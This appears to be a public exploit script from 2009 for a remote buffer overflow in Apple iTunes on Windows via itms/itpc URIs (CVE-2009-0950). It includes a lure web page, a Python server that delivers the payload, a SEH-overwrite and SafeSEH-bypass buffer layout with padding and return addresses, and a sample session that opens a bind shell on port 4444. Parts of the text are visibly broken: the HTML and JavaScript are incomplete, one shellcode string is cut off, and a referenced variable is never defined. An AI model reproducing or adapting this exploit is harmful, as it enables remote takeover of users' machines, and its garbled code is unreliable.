Apple iTunes (itms/itcp) Remote Buffer Overflow Exploit (win)

# Apple iTunes itms/itcp BOF Windows Exploit
# Matteo Memelli | ryujin __A-T__
# Spaghetti & Pwnsauce – 06/10/2009
# CVE-2009-0950

# Vulnerability can’t be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# – the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# – the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes,
# –> hola hola ziplock, my Apple Guru! ;) && cheers to muts… he knows why
# ryujin:Desktop ryujin$ ./
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__
# [+]
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from:
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 4444
# Connection to 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\Mozilla Firefox>

from socket import *

html = """
  <head><title>iTunes loading . . .</title>
   function openiTunes(){document.location.assign("itms://");}
   function prepareStack(){document.location.assign("%s");}
   function ownSeh(){document.location.assign("%s");}
   function ipwn(){
   function main() {
    // Increase this timeout if your iTunes takes more time to load!
  <body onload="main();">
    <p align="center">
    <b>iTunes URI Bof Exploit Windows Version CVE-2009-0950</b>
    <p align="center"><b>ryujin __ A-T __</b></p>
    <p align="center"><b></b></p>
    <p align="center">
    iTunes starting... wait for 20 secs; if you get an error, click "Ok"
    in the MessageBox before checking for your shell on port 4444 :)<br/>
    If victim host is not connected to the internet, exploit will fail
    unless iTunes is already opened and you disable "openiTunes" javascript
    <h2 align="center">
    <b><u>This exploit works if opened from Firefox not from IE!</u></b>
    <p align="center">
    After exploitation iTunes crashes, you need to kill it from TaskManager
    <br/>have fun!</br>

# Alpha2 ASCII  printable  Shellcode  730 Bytes, via  EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode  is modified
# in order to obtain register alignment and to  reset ESP and EBP we  mangled
# before. Rest of decoded shellcode is Metasploit  bind  shell  on  port 4444
# EXITFUNC=thread
# Padding
pad0x1          = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 [email protected] w00t w00t
align           = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2          = "\x41"*570                                   

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret             = "\x2a\x5e\x21\x67"

# Let the dance begin... Point EBP to encoded jmp
align_for_jmp   = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

jmp_back        = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
# Padding
pad0x3          = "\x43"*162                                   

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1            = "itms://:" + "\x41"*200 + "/"
url2            = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
                               align_for_jmp + jmp_back + pad0x3
payload         = html % (url1, url2)

print "[+] iTunes URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__"
print "[+]"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("", 80))
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
print "[+] Payload sent, wait 20 secs for iTunes error!"

# [2009-06-12]